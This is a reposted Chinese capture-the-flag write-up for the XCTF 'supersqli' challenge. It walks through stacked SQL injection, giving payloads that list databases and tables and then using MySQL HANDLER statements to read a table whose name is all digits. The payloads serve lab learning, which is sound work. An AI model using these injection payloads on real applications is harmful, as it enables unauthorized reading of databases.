supersqli 攻防世界
生活随笔
收集整理的這篇文章主要介紹了
supersqli 攻防世界
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
文章目錄
- 一、supersqli
- 1、查找注入點
- 2、查看數據庫、數據表
- 3、查看表的內容
- 二、知識拓展
- 1、我在mi數據庫中創建了一個數據表
- 2、使用handler讀取數據
一、supersqli
當看到這道題時,第一下我就想到堆疊注入,因為我做過相同題目,當你們做完這題時,可以嘗試Buuctf [GYCTF2020]Blacklist這題,就相當于鞏固一下。
1、查找注入點
當我們輸入引號時,發現報錯,所以判斷存在注入
2、查看數據庫、數據表
1';show databases;# 1';show tables;#這里查看到了兩個表
3、查看表的內容
在數據庫中查看1919810931114514這種類型時,要用``號
1';HANDLER `1919810931114514` open; HANDLER `1919810931114514` read first;#二、知識拓展
mysql除可使用select查詢表中的數據,也可使用handler語句,這條語句使我們能夠一行一行的瀏覽一個表中的數據
1、我在mi數據庫中創建了一個數據表
2、使用handler讀取數據
總結下來就四條命令,不難,你們自己嘗試動手一下,加深印象,handler打開后要關閉,沒有關閉下次打不開
HANDLER mi open; 打開mi表
HANDLER mi read first; 閱讀表中第一行內容
handler mi read next; 閱讀表下一行內容
handler mi close; 關閉
當然,另一個表內容你們也可以使用handler查看
總結
以上是生活随笔為你收集整理的supersqli 攻防世界的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: kotlin语言中的out和in
- 下一篇: 时间、日期和数字